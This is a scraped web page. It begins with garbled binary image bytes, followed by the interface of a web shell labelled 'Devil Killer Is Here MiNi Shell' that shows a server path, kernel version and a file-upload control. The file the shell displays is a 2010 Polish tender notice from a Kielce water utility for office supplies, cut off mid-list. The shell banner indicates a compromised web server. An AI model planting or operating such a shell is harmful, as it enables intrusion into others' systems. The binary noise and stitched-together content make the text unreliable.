JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101126/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101126/384652-N-2010.html

<p class="kh_header"><b>Kielce: Sukcesywna dostawa papieru i art. biurowych</b><br>
<b>Numer ogłoszenia: 384652 - 2010; data zamieszczenia: 26.11.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Wodociągi Kieleckie Sp. z o.o. , ul. Krakowska 64, 25-701 Kielce, woj. świętokrzyskie, tel. 041 3653100, faks 041 3455220.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.wod-kiel.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Sukcesywna dostawa papieru i art. biurowych.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem postępowania jest sukcesywna dostawa papieru i art. biurowych według poniższego zestawienia:
1.   Blok do biuwaru 100 kartek -300 szt.
2.   Blok szkolny A4 50 kartek - 200 szt.
3.   Blok szkolny A5 50 kartek - 150 szt.
4.   Blok techniczny A4  - 12 szt.
5.   Karton do bindowania A-4  250g., kolor niebieski; 1op. = 100 szt. - 10 op.
6.   Folia do bindowania A4; 200 mic.;  1op. = 100 szt. - 10 op.
7.   Grzbiety do bindowania: 
- śr. fi 6;      1op.=100szt.- 1 op.
  śr. fi  8;      1op.=100szt.- 1 op.
  śr. fi  10,    1op.=100szt.- 4 op. 
  śr. fi  12,5  1op.=100szt.- 2 op. 
  śr. fi  14,    1op.=100szt.- 1 op.
  śr. fi  16,    1op.=100szt.- 1 op. 
  śr. fi  18,    1op.=100szt.- 4 op.
  śr. fi  20,    1op.=100szt.- 1 op.
  śr. fi  22,    1op.=100szt.- 1 op.
  śr. fi  25,    1op.=100szt.- 1 op.
  Kolor granatowy
8.    Folia do laminarki  A4; 100 mikronów; 1op. = 100 szt. - 6 op.
9.    Folia do drukarki atramentowej A4;  1op. = 100 szt (samoprzylepna przeźroczysta) - 2 op.
10.  Koperty samoprzylepne;C 6  białe;1op. = 1000 szt. - 30 op.
11.  Koperty samoprzylepne;C 6 okno prawe białe; 1op. = 1000 szt. - 5 op.
12.  Koperty białe  C 5 z paskiem HK;1op. = 500 szt. - 10 op.
13.  Koperty białe  B 4;z paskiem HK 250x253; 1op. = 500 szt. - 2 op.
14.  Koperta biała B4  samoprz. z rozszerzonymi bokami  i spodem, z paskiem HK 250 x 534 x 40 - 
       250 szt.
15. A.  Notes samoprzylepny 75 x 75mm; 1bl.=100 kart. - 400 bl.
      B.  Notes samoprzylepny 76 x 76mm mix kolor; 1bl.=400 kart. - 20 bl.
16. A. Papier ksero A4;80 g/m2; CIE 166 - 1500 ryz
       B. Papier ksero A4;80 g/m2; CIE 146 - 500 ryz
17. A. Papier ksero A3;80 g/m2; CIE 166 - 50 ryz
       B. Papier ksero A3;80 g/m2; CIE 146 - 10 ryz
18. A. Papier ksero A2;80 g/m2; CIE 166;1 ryza = 500 ark. - 2 ryzy
         B. Papier ksero A2;80 g/m2; CIE 146;1 ryza = 500 ark. - 2 ryzy
19. Papier komp. 240 x 12 x 1; 2000 składanek - 90 kartonów
20. Papier komp. 375 x 12 x 1; 2000 składanek - 25 kartonów
21. Papier komp.;240 x 12 x 2; kopia kolor;900 składanek - 10 kartonów
22. Papier kancelaryjny A3 w kratkę; 1op. = 500 ark. - 2 op.
23. Karton wizytówkowy A4;  1op. =20 szt kolor: biały i kremowy - 80 op.
24. Teczka do podpisu A4 grzbiet harmonijka; 15 kart; oprawa nitro, kolory do wyboru  - 20 szt.
25. Teczka na rzep A4 szerokość grzbietu min. 4 cm; PCV okleina - 50 szt. 
26.  Teczka z gumką A4 kolor laminowana . min 3 kolory do wyboru -  500 szt. 
27. Teczka tekturowa wiązana A4 - 300 szt.
28. Zeszyt A5 16 kart. w kratkę, miękka okładka - 60 szt
29. Zeszyt A5 32 kart. w kratkę, miękka okładka - 60 szt
30. Zeszyt A5 60 kart. w kratkę, miękka okładka - 60 szt
31. Zeszyt A5 80 kart. w kratkę, miękka okładka - 60 szt.
32. Zeszyt A5  96 kart. w kratkę, twarda okładka - 65 szt.
33. Zeszyt A4  96 kart. w kratkę, twarda okładka - 60 szt.
34. Zeszyt B5  160 kart. w kratkę, twarda okładka - 30 szt.
35. Kołonotatnik A4 50 kartek   - 10 szt.
36. Kołonotatnik A5 50 kartek -10 szt
37. Skorowidz A4; 96 kartek; op. Intro - 10 szt.
38. Skorowidz A5; 96 kartek; op. Intro - 15 szt
39. Wizytownik na min. 96 wizytówek. ; 3 kolory do wyboru -   10 szt
40. Segregator A4/75  z wymienną etykietą okleina PCV na zewnątrz segregatora; brzegi
     dolne okucie metalowe, różne kolory - 1300 szt
41. Segregator A4/75 kartonowy z okuciem -200 szt.
42. Segregator A4/50 z wymienną etykietą okleina PCV na zewnątrz segregatora; brzegi 
      dolne okucie metalowe - 600 szt.
43. Segregator A4/50 kartonowy z okuciem -50 szt. 
44. Segregator A5/75 z wymienną etykietą okleina PCV na zewnątrz segregatora; brzegi
      dolne okucie metalowe -120 szt 
45. Segregator A5/75 kartonowy z okuciem - 40 szt.
46. Taśma izolacyjna z PE; Szer. 20-25 mm, dł.ok.25m: Czerwona - 3szt.; Niebieska -3szt.; 
      żółta - 2 szt.
47. Wałek  barwiący IR40 czarny do kalk. Citizen - 2 szt.
48. Skoroszyt tekturowy pełny A4 - 600 szt
49. Skoroszyt  tekturowy pełny oczko A4 - 1500 szt
50. Skoroszyt tekturowy ? oczko  A4 - 1700 szt
51. Skoroszyt oczkowy  ? A4, tekturowy - 250 szt
52. Skoroszyt zawieszkowy ? A4 - 200 szt
53. Skoroszyt plastikowy wpinany A4, różne kolory. -2000 szt 
54. Skoroszyt plastikowy miękki A4, różne kolory - 200 szt
55. Taśma klejąca ; 24 x 30 mb - 150 szt
56. Taśma pakowa szara; 48 x 50 mb - 25 szt
57. Długopis samoprzylepny - 12 szt
58. Przekładki kartonowe 1/3 A4 ;1 op.=100szt. niebieskie -25 kpl. 
59. Długopis z automatycznym wkładem, gumowym uchwytem- niebieski -500 szt. 
60. Kalka ołówkowa, fioletowa 1op. = 50 ark. - 5 op.
61. Antyrama 60/90 - 10 szt
62. Tablica korkowa;60 x 90 rama drewniana - 10 szt
63. Piórnik na przybory do pisania; z pleksy z przegródkami 3 wzory np. prostokątny, walec lub inny wzór - 25 szt
64. Poduszka do stempli;70x110mm nasączona tuszem - 5 szt
65. Tusz do stempli o pojemności min. 25 ml. Kolory zielony, czerwony, czarny - 25 szt.
66. Datownik plastikowy automat samotuszujący - 5 szt
67. Numerator, profesjonalny automat szkieletowy w metalowej obudowie, samotuszujący -1 szt 
68. Kalkulator biurowy o dużych  klawiszach, 12-to pozycyjny wyświetlacz, funkcja sprawdzania i poprawy obliczeń(do 100 kroków),funkcja check & correct, obliczanie podatku VAT, suma
      całkowita, obliczanie procentowe, zmiana znaku, klawisz podwójnego i potrójnego zera,
      metalowa obudowa- 15 szt.
69. Ofertówka / koszulka A4 wpinana ,40 mic. groszkowa;1op. = 100 szt -150 op.
70. Ofertówka /koszulka A5  wpinana, 40 mic. groszkowa;1op. = 100 szt - 10 op.
71. Okładka z nadrukiem firmowym A4 zgodnie ze wzorem dostępnym w Dziale Administracji Wodociągów Kieleckich  -1000 szt 
72. Okładka na dyplom A4; sztywna okładka o fakturze skóry z ozdobną tasiemką i tłoczonym, 
      złotym napisem zgodnie ze wzorem dostępnym w Dziale Administracj Wodociągów Kieleckich -100 szt. bez napisu,250 szt. z napisem ; kolor: granat -100 szt.; bordowy - 150 szt.;
      ciemna zieleń - 100 szt.
73. Cienkopis  - czarny - 500 szt
74. Cienkopis  - niebieski - 500szt.
75. Cienkopis   - zielony - 300 szt
76. Cienkopis  - czerwony - 200 szt
77. Marker, okrągła końcówka - nietoksyczny  z atramentem na bazie alkoholu. Możliwość pisania
      po każdego rodzaju powierzchni.  o gr. 2,2 - 2,5 mm, czarny - 100 szt
78. Marker, okrągła końcówka - nietoksyczny  z atramentem na bazie alkoholu. Możliwość pisania po każdego rodzaju powierzchni.  o gr. 2,2 - 2,5 mm, niebieski - 60 szt
79. Marker, okrągła końcówka - nietoksyczny marker z atramentem na bazie alkoholu. Możliwość pisania po każdego rodzaju powierzchni.  o gr. 2,2 - 2,5 mm, zielony - 60 szt
80. Marker, okrągła końcówka - nietoksyczny  z atramentem na bazie alkoholu. Możliwość pisania  po każdego rodzaju powierzchni o gr. 2,2 - 2,5 mm, czerwony -60 szt 
81. Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka -Grubość linii pisania 0,8 - 1,2 mm; - srebrny -50 szt; - czerwony - 2 szt. 
82. Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka -. Grubość linii pisania 2,2 - 2,8 mm - srebrny - 50 szt.
83. Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka -. Grubość linii pisania  0,8 - 1,2 mm - złoty -  50 szt   
84. Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka -. Grubość linii pisania   2,2 - 2,8 mm - złoty -50 szt.  
85. Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka -Grubość linii pisania  0,8 - 1,2 mm - czarny - 50 szt 
86.  Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka -Grubość linii pisania   2,2 - 2,8 mm - czarny - 50 szt.
87.  Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka - Grubość linii pisania  0,8 - 1,2 mm - brązowy -50 szt  
88.   Marker z tuszem olejowym odpornym na ścieranie, okrągła końcówka -Grubość linii pisania  2,2 - 2,8 mm - brązowy - 50 szt
89. Flamastry ( po 4 kolory w kpl.) -10 kpl.  
90. Długopis z wymiennym wkładem, obudowa biała, nadruk firmowy wzór dostępny w Dziale Administracji Wodociągów Kieleckich -  800 szt
91. Cienkopis brązowy - 40 szt 
92. Pióro żelowe z wymiennym wkładem - gr. 0,5 mm, czarny - 160 szt
93. Pióro żelowe z wymiennym wkładem - gr. 0,5 mm niebieski - 160 szt
94. Zakreślacz  żółty - 100 szt
95. Zakreślacz  zielony - 100 szt
96. Zakreślacz różowy - 100 szt
97. Zakreślacz  pomarańczowy - 80 szt
98. Zakreślacz  niebieski - 80 szt
99. Ołówek z drewna, miękki z gumką -150 szt 
100. Ołówek automatyczny z gumowym uchwytem; wyposażony w wymienną gumkę; chowana  prowadnica grafitu, gr. 0,5mm -80 szt 
101. Temperówka  metalowa z metalowym ostrzem - 60 szt
102. Wkład do długopisu wielkopojemny, gruby, metalowy,  czarny - 100 szt
103. Wkład do długopisu wielkopojemny, gruby, metalowy, niebieski - 100 szt
104. Wkład do długopisu zwykły z grubą końcówką,  czarny - 100 szt
105. Wkład do długopisu firmowego - czarny (wkłady muszą pasować do długopisów oferowanych  w poz. 90)  - 100 szt.
106. Wkład do długopisu zwykły z grubą końcówką  -  niebieski - 100 szt
107. Wkład do długopisu firmowego - niebieski (wkłady muszą pasować do długopisów  oferowanych w poz. 90)  - 150 szt.
108. Wkład do długopisu popularny czarny - 50 szt
109. Wkład do długopisu popularny niebieski -50 szt 
110. Wkład do długopisu Pentel czarny, niebieski - 50 szt
111. Wkład do długopisów żelowych,  gr. 0,5 mm - czarny -150 szt 
112. Wkład do długopisów żelowych,  gr. 0,5 mm -  niebieski - 150 szt
113. Rysiki do ołówków (po 12 szt), twardość HB, 2B; grubość: 0,5mm - 80 op.;0,6mm - 10 op.;  0,7mm -10 op.
114. Naboje do piór Pelikan  dł. 7 mm (po 5 szt), niebieskie - 20 op.
115. Naboje do piór Pelikan  dł. 7 mm (po 5 szt), czarne -10 op.
116. Gumki do ścierania; wymiar 1,5-2 x 3,5-4 cm nie uszkadzająca powierzchni papieru przy  ścieraniu - 90 szt
117. Gumka recepturka - 5 kg
118. Linijka plastikowa przeźroczysta:    - 20 cm - 50 szt.; - 30 cm -20 szt.; - 40 cm - 20 szt.
119. Pinezka tablicowa(po 50 szt) - 20 op.
120. Pinezka srebrna ;1 op. =10 pudełeczek - 20 op.
121. Klej w sztyfcie 15 gram - 100 szt
122. Klej w płynie 50 ml - 150 szt
123. Rolka termiczna szer.57mm dł.30 m. - 12 szt.
124. Dziurkacz  pojedynczy;
        -z metalową podstawką i uchwytem z niełamliwego plastiku lub
        metalowym; możliwość dziurkowania min. 25 kartek; wysuwany ogranicznik formatu - 25 szt. 
        -wykonany z metalu- możliwość dziurkowania min. 40 kartek; wysuwany ogranicznik formatu   -8 szt.
125. Dziurkacz  podwójny na minimalną ilość kartek - 1 szt; dziurkacz  podwójny na maksymalną    ilość kartek - 1 szt.
126. Nożyczki ze stali nierdzewnej; dł. min. 20,5 cm - 40 szt; Nożyczki ze stali nierdzewnej  dł. 23 cm - 3 szt. 
127. Zszywacz metalowy w plastikowej obudowie; zszywa min. 15 kartek -  30 szt; 
 Zszywacz - zszywający jednorazowo  130- 260 kartek - 2 szt.; Zszywacz  mini - 5 szt.
128. Zszywki (po 1000 szt): 
       24/6 - 50 op., 
       23/23 -4 op., 
      do zszywacza mini - 1 op.
129. Rozszywacz - 20 szt
130. Spinacze R-28;1op. = 10 pudełeczek - 50 op.
131. Półka na dokumenty; w formacie A4 - 40 szt 
132. Reklamówka firmowa - wzór dostępny w  Dziale Administracji  Wodociągów 
        Kieleckich ; Większy rozmiar -700 szt.; Mniejszy rozmiar - 300 szt.
133. Korektor w taśmie pokrywa każdy rodzaj tuszu; szerokość taśmy min. 5 mm; długość min. 9 m -230 szt 
134. Korektor w pisaku szybkoschnący płyn; cienka metalowa końcówka; pojemność min. 8 ml -  50 szt
135. Teczka A4 z klipem, klip o szer. min 9 cm - 50 szt
136. Teczka z  klipem A5 klip o szer. min. 9 cm - 50 szt
137. Przekładka alfabetyczna A4 kartonowa; kolorowa A-Z - 20 kpl
138. Przekładka numeryczna A-4 kartonowa 1-31 -20 kpl
139. Plan Miasta Kielc    (aktualny, składany) -30 szt 
140. Papier fotograficzny A4-180 g/m2 błysk (po 50 szt) - 10 op.
141. Spinacz krzyżowy na dokumenty - 10 op.
142. Zeszyt A4  200 k. w kratkę twarda oprawa, kartki zszywane - 12 szt
143. Zeszyty A4 w linię 100k. twarda oprawa - 10 szt.
144. Taśma pakowa papierowa szara 60mm x 50m. - 8 szt.
145. Segregator ofertowy  A-4 wykonany z wysokiej jakości folii PVC z przeźroczystymi kieszeniami na przedniej okładce i grzbiecie - wyposażony w mechanizm 4 - ringowy  w kształcie litery D - kolor biały, szer. 75mm - 20 szt.
      Segregator ofertowy  A-4 wykonany z wysokiej jakości folii PVC z przeźroczystymi  kieszeniami na przedniej okładce i grzbiecie - wyposażony w mechanizm 4 - ringowy w kształcie litery D - kolor biały, szer. 50mm - 20 szt.
       Segregator ofertowy A-4 wykonany z wysokiej jakości folii PVC z przeźroczystymi  kieszeniami na przedniej okładce i grzbiecie - wyposażony w mechanizm 4 - ringowy   w kształcie litery D - kolor biały, szer. 25mm - 10 szt.
146. Koszulka groszkowa na katalogi A4,170mic,op.10 szt. (przeźroczysta, grzbiet 
       harmonijka na dużą ilość dokumentów) - 55 op.
147. Mapa turystyczno-topograficzna Kielce i okolice - 10 szt.
148. Papier A4 samoprzylepny, czerwony - 50 ark
149. Papier A4 samoprzylepny, zielony - 50 ark
150. Papier A4 samoprzylepny, niebieski - 50 ark
151. Papier A4 samoprzylepny, żółty - 50 ark
152. Papier A4 samoprzylepny, biały - 150 ark
153. Teczka twarda na rzep lub tasiemki grubość min. 5,0 cm - 50 szt
154. Taśma papierowa żółta 50 x 33 mm (malarska) -5 rolek; Taśma papierowa żółta (wąska) - 5
        rolek
155. Zszywki długie 23/8, 23/10;23/13; 23/15; 23/17;1 op. = 10 pudełeczek - Po 1 op. zbiorczym
156. Spinacze duże R-50;1 op. = 10 pudełeczek -10 op.
157. Papier A4 ksero, różne kolory: niebieski, żółty, zielony, pomarańczowy, błękitny, czerwony  - 6 ryz
158. Segregator na Dziennik Ustaw - 30 szt.
159. Segregator na Monitor Polski - 20 szt.
160. Taśma dwustronnie przylepna, wąska 1,5 - 2,5 mm -15 szt.
161. Papier kolorowy A4 80g mix, kolory intensywne: niebieski, żółty, czerwony, zielony - 6 ryz
162. Cienkopis typ PIN 05-200, czarny, wodoodporny, do aparatu (do liczenia kolonii bakterii)   -1 szt.
163. Marker czarny do opisywania płyt CD - 50 szt.
164. Maczałka - 10 szt.
165. Litery samoprzylepne; wys.10mm, szer. 10mm ;
      Kolor: Czarny -5 ark.; Czerwony - 3 ark.; Żółty -3 ark.; Zielony - 3 ark.
166. Litery samoprzylepne; wys. 15 mm, szer. 15mm;
        Kolor: czarny-3 ark.; czerwony-3 ark.; żółty -3 ark.; zielony - 3 ark.
167. Cyferki samoprzylepne: wys. 15 mm, szer. 10 mm; 
        Kolor: czarny-10 ark, czerwony -5 ark. ,żółty - 5 ark, zielony  - 5 ark.  
168. Etykiety samoprzylepne A4;105x57 mm - 2 ryzy;105x74 mm - 2 ryzy
169. Kartki świąteczne z życzeniami, min. 6 wzorów, razem z kopertami (Boże Narodzenie,  
        Wielkanoc) - 120 szt.
170. Papier pakowy szary 100 x 120 cm, g/m2. 70 - 100 ark+ 10 kg.
171. Sznurek konopny (waga  1op.= 0,5 kg.) -5 szt.
172. Sznurek dratwa ,(waga 1 op.=0,5 kg.) -5 szt.
173. Litery samoprzylepne; wys. 5 cm, szer.4 cm ;
        Kolor: biały -20 ark.,czarny - 20 ark., niebieski - 20 ark.
174. Cyfry samoprzylepne;Wys.5 cm, szer,4 cm;
       Kolor: biały - 20 ark., czarny - 20 ark., niebieski - 20 ark.
175. Koszulki foliowe na płyty CD  - 300 szt.
176. Pudełko organizer na 100 szt.  płyt CD - zamykane - 5 szt.
177. Breloczki na klucze - 200 szt.
178. Klip do papieru -metalowy 1op.=12 szt, różne wymiary ;15, 19, 25, 32, 41, 51 - 216 szt.(po  3 op. każdego wymiaru)
179. Znaczniki samoprzylepne plastikowe (zakładka indeksująca)kolorowe - 60 op.
180. Koperta biała z zabezp. powietrza B4  250 x 350 - 100 szt.
181. Folder sztywny A4 (ofertówka) - 100 szt.
Do oferty należy załączyć wzór każdego towaru z nadanym numerem porządkowym wyszczególnionym w SIWZ.
Do oferty należy dołączyć spis przekazanych materiałów biurowych;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówienia uzupełniającego stanowiącego nie więcej niż 20% wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.10.00.00-0, 22.80.00.00-8, 44.11.15.20-7, 37.82.32.00-5, 39.29.80.00-7, 39.24.12.00-5, 18.93.71.00-7, 22.11.43.00-7, 22.90.00.00-9, 44.17.60.00-4, 39.54.11.30-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem udziału w postępowaniu jest wniesienie wadium w wysokości:  1 500,00 zł</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie warunku na podstawie złożonego przez Wykonawcę oświadczenia według wzoru określonego w załączniku nr  2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie warunku na podstawie złożonego przez Wykonawcę oświadczenia według wzoru określonego w załączniku nr  2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie warunku na podstawie złożonego przez Wykonawcę oświadczenia według wzoru określonego w załączniku nr  2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie warunku na podstawie złożonego przez Wykonawcę oświadczenia według wzoru określonego w załączniku nr  2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający oceni spełnianie warunku na podstawie złożonego przez Wykonawcę oświadczenia według wzoru określonego w załączniku nr  2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

